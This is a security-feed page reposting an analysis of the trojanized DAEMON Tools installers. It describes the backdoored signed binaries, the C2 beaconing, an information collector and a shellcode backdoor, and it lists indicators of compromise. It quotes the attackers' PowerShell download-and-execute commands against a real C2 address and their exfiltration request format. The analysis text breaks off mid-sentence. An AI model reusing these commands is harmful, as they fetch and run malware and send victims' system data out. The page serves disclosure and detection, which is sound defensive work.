THREATNOIR
Subscribe
Back to Feed
Supply ChainMay 5, 2026

Popular DAEMON Tools software compromised

DAEMON Tools installers compromised with trojanized binaries deploying backdoors and info-stealers.

Read at source

Summary

Between April 8 and early May 2026, attackers compromised legitimate DAEMON Tools installers (versions 12.5.0.2421 to 12.5.0.2434) distributed from the official website, injecting malicious payloads into signed system binaries. The supply chain attack affected 100+ countries with targeted secondary payload deployment to retail, scientific, government, and manufacturing organizations; artifacts suggest Chinese-speaking threat actors. The compromised binaries beacon to a typosquatted C2 domain, downloading info-stealers and backdoors that exfiltrate system configuration, process lists, and software inventory.

Full text

Threat Response Table of Contents What happened?Trojanized binariesInformation collectorMinimalistic backdoorQUIC RATVictimologyRecommendations and conclusionDetection by Kaspersky solutionsIndicators of compromise UPD 5/5/26: added detection rules and examples by KEDR Expert, and verified detection of the malicious activity using our Kaspersky Managed Detection and Response service. What happened? In early May 2026, we identified installers of the DAEMON Tools software, used for mounting disk images, to be compromised with a malicious payload. These installers are distributed from the legitimate website of DAEMON Tools and are signed with digital certificates belonging to DAEMON Tools developers. Our analysis revealed that the software installers have been trojanized starting from April 8, 2026. Specifically, we identified versions of DAEMON Tools ranging from 12.5.0.2421 to 12.5.0.2434 to be compromised. At the time of writing this article, the supply chain attack is still active. Artifacts suggesting that the threat actor behind this attack is Chinese-speaking have been identified in the malicious implants observed. We contacted AVB Disc Soft, the developer company of DAEMON Tools, so that further actions could be taken to remediate the attack consequences. Starting from early April, we observed several thousands of infection attempts involving DAEMON Tools in our telemetry, with individuals and organizations in more than 100 countries being affected. However, out of all the machines infected, we have observed further-stage payloads being deployed to only a dozen of them. These machines that received further payloads belonged to retail, scientific, government and manufacturing organizations – and this indicates that the supply chain attack has a targeted manner. Kaspersky solutions protect its users from the malicious payloads deployed through the DAEMON Tools supply chain attack. Trojanized binaries Our analysis revealed that for DAEMON Tools versions from 12.5.0.2421 to 12.5.0.2434, attackers have managed to compromise the following binaries inside the software installations: DTHelper.exe DiscSoftBusServiceLite.exe DTShellHlp.exe These files are located in the directory where DAEMON Tools is installed, for example C:\Program Files\DAEMON Tools Lite. Notably, these files are digitally signed by the developer of DAEMON Tools, AVB Disc Soft. Whenever one of these binaries is launched, which happens at the machine startup, a backdoor gets activated. This backdoor is implanted in the startup code responsible for initializing the CRT environment. The backdoor runs in a dedicated thread, used to send GET requests to the following URL: https://env-check.daemontools[.]cc/2032716822411?s=<full computer name> 1 https://env-check.daemontools[.]cc/2032716822411?s=<full computer name> URL. The server used for communications is malicious, and its address is designed to typosquat the legitimate daemon-tools[.]cc domain name used for downloading DAEMON Tools. Notably, according to WHOIS, the domain name of the malicious server was registered on March 27, about a week before the start of the supply chain attack. Snippet of the decompiled code, responsible for forming the GET request URL string in a loop In response to the requests sent, the server may return a shell command to be executed through the cmd.exe process. We observed this shell command to have the following template: cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/<hexadecimal string>','C:\Windows\Temp\<filename>.exe')"&& %TEMP%\<filename> <arguments> &&del %TEMP%\<filename>.exe" 1 cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/<hexadecimal string>','C:\Windows\Temp\<filename>.exe')"&& %TEMP%\<filename> <arguments> &&del %TEMP%\<filename>.exe" As can be observed from the template, these shell commands are used for downloading and launching an executable payload. We have seen multiple types of these payloads, which we describe below. Information collector The first payload we observed to be deployed by attackers is an information collector. It was deployed through the following command: cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/env_check_script','C:\Windows\Temp\envchk.exe')"&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe 1 cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/env_check_script','C:\Windows\Temp\envchk.exe')"&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe The envchk.exe file (SHA1: 2d4eb55b01f59c62c6de9aacba9b47267d398fe4) is a .NET executable used for collecting extended system information. Notably, its code includes strings in Chinese. While this may imply that a Chinese-speaking actor is behind this attack, we do not currently attribute the DAEMON Tools compromise to any particular actor. Screenshot of the information collector code with strings in Chinese inside The data collected by the information collector includes: MAC address (first non-zero one); Hostname; DNS domain name; List of running processes, separated by semicolons; List of installed software, separated by semicolons; System locale. This information is sent to the C2 server specified in the command line argument of the information collector. As can be observed from the command above, the address of the server is http://38.180.107[.]76/09505aca4f538bd 1 http://38.180.107[.]76/09505aca4f538bd The data is relayed inside the following POST request body: C++ a=<MAC address>&b=<hostname>&c=<DNS domain name>&d=<process list>&e=<software list>&f=<locale> 1 a=<MAC address>&b=<hostname>&c=<DNS domain name>&d=<process list>&e=<software list>&f=<locale> Minimalistic backdoor While we observed the information collector being attempted to be deployed on a large number of infected machines, we as well noted that attackers attempted to deliver another payload to a very small number of machines, equating to about a dozen. Based on this fact, we conclude with a high degree of confidence that the information collector is used for profiling the infected machines, with the profiling results further used to deploy additional payloads in a targeted manner. One of such payloads we observed is a minimalistic backdoor. We observed it being deployed with the following command: cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/b3593ac2edb34f4d4d','C:\Windows\Temp\cdg.exe')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/368b1365bd9176b359','%TEMP%\cdg.tmp')"&&%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&&del %TEMP%\cdg.exe&&del %TEMP%\cdg.tmp" 1 cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/b3593ac2edb34f4d4d','C:\Windows\Temp\cdg.exe')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/368b1365bd9176b359','%TEMP%\cdg.tmp')"&&%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&&del %TEMP%\cdg.exe&&del %TEMP%\cdg.tmp" As can be observed, this command is used to download two files, cdg.exe and cdg.tmp. The cdg.exe file, which is further launched, is a shellcode loader, which opens the cdg.tmp file, decrypts it with RC4 (with the key specified in the final argument, which is first_match in the case above), and runs it as shellcode. cdg.exe shellcode loader usage This shellcode represents the backdoor body. The backdoor itself sends POST request heartbeats to the following URL: http://38.180.107[.]76/79437f5edda13f9c066/version/check 1 http://38.180.107[.]76/79437f5edda13f9c066/version/check URL. Its features include abil

Indicators of Compromise

  • domain — env-check.daemontools.cc
  • ip — 38.180.107.76
  • hash_sha1 — 2d4eb55b01f59c62c6de9aacba9b47267d398fe4
  • url — https://env-check.daemontools.cc/2032716822411
  • url — http://38.180.107.76/env_check_script

Entities

DAEMON Tools Lite (product)AVB Disc Soft (vendor)Digital code signing certificates (technology)